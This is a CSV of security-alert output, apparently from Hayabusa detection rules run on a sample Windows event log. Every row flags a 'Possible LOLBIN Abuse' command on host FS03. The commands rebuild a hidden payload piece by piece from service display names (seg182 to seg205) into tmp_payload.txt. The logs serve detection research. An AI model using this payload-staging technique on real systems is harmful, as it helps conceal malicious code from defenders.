2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:55.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:55.114 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:56.538 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:56.554 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x470 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xabc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:06.713 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:06.728 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:11.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xed4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:11.124 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:14.049 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:14.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:15.496 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:15.511 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:19.854 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:19.869 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x32c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:25.692 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
